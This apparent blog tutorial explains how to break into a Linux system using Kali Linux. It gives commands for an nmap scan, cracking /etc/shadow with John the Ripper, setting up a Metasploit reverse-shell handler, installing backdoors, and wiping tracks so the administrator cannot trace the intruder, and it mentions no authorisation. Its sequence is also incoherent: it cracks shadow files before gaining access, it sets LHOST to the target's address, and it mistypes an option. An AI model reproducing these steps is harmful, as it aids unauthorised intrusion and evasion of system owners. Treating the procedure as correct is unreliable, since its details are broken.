Kali Linux is a powerful open source operating system that is widely used by penetration testers and security researchers. It is based on the Debian distribution and comes pre-installed with a wide range of security tools.
In this guide, we will show you how to hack a Linux system using Kali Linux.
Before we start, you need to have the following:
A Kali Linux system
A target Linux system
Now let’s get started.
1. Information Gathering
The first step is to gather information about the target system. We can use the nmap tool for this purpose.
# nmap -sV 192.168.1.1
2. Password Cracking
Once we have gathered information about the target system, we can start cracking passwords. There are various tools that can be used for this purpose, such as Hydra, Medusa, and John the Ripper.
In this example, we will use John the Ripper to crack the password of the root user.
# john –wordlist=/usr/share/wordlists/rockyou.txt /etc/shadow
3. Privilege Escalation
After we have cracked the password, we can now login to the system. However, we only have limited privileges. In order to gain full control of the system, we need to escalate our privileges.
There are various ways to do this, but we will use the Linux Privilege Escalation Checklist.
4. Post-Exploitation
Once we have gained full control of the system, we can now start post-exploitation. This is where we can install backdoors, gather confidential information, and so on.
There are various tools that can be used for this purpose, but we will use the Metasploit framework.
# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload linux/x64/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.1
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit
5. Cleanup
Once we are done with post-exploitation, we need to cleanup our tracks. This is to make sure that the system administrator will not be able to track us down.
There are various ways to do this, but we will use the Metasploit framework.
# msfconsole
msf > use post/linux/cleanup/track_clear
msf post(track_clear) > set SESSION 1
msf post(track_clear) > run